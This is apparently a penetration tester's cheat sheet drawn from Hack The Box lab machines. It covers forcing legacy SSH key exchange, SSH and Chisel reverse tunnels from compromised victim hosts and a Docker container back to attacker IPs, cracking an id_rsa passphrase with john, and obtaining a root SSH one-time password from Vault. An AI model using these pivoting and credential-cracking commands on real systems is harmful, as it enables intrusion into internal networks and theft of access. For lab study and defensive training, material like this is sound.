$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb
SSH Tunneling
// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10
// Local tunnel from attacker, enum victim port 8002
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa
## Using Chisel to enumerate local webservices on remote host
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse
// Chisel Client (victim host)
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080
## Using Chisel to setup a tunnel from compromized docker container to proxy
## traffic toward docker host (172.17.0.1:3000).
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse
// Chisel Client (victim docker)
./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000
Brute Force id_rsa
// Convert id_rsa (.pem) to hash with ssh2john, and crack with john.
$ ssh2john.py id_rsa > id_rsa.hash
$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Vault SSH OTP
Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the role example ssh/creds/otp_key_role, the role is found in secrets.sh.
$ vault write ssh/creds/root_otp ip=10.10.10.110
Key Value
--- -----
lease_id ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5
lease_duration 768h
lease_renewable false
ip 10.10.10.110
key 1762e6a1-f975-61f8-814e-f7d65a2a1f51
key_type otp
port 22
username root